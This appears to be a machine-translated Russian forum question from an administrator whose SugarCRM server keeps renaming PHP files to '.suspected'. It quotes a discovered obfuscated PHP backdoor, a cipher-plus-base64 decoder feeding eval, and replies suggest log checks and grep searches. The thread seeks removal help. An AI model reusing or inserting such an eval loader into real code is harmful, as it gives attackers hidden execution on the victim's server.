За последние 4 дня мы сталкиваемся с проблемой на нашем производственном сервере (экземпляр AWS EC2), относящемся только к одному сайту, который является SugarCRM.php-файл автоматически переименован в php.suspected
Выпуск /home/site_folder/public_html/include/MassUpdate.php файл переименовывается автоматически /home/site_folder/public_html/include/MassUpdate.php.suspected
Это происходит 2-3 раз в день с 3-4 часами пробела. Эта проблема возникает только в случае конкретного сайта, даже если это не происходит для постановки реплики того же сайта. Я даже проверял код этого файла с обоих сайтов, это то же самое.
У нас есть поисковая система и найдена, такая проблема возникает главным образом для сайтов Wordpress, и это может быть из-за атаки. Но мы проверили наш сервер против атаки, нет. Кроме того, на сервере нет сканирования вирусов и вредоносных программ.
Что нам делать?
Update: Мы нашли кое-что, пройдя через эту link Мы провели egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/
и обнаружили, что есть несколько файлов со следующими примерами кода.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
Похоже, что это вредоносная программа, как мы ее удаляем постоянно?
Благодаря
Может быть, есть функция cron doin this. –
Нет таких запусков cron. –
Если это приложение для производства, я рекомендую немедленно обратиться к эксперту по безопасности. Можете ли вы проверить журналы своего веб-сервера, чтобы увидеть какие-либо странные запросы к этому файлу непосредственно перед изменением имени? Можете ли вы попробовать запустить это из CLI 'find. -name "* .php" -exec grep -H "eval (" {} \; "из public_html/level. Это будет искать все php-файлы, которые, возможно, были созданы хакером, который вызывает' eval'. может найти ложные срабатывания с этим. –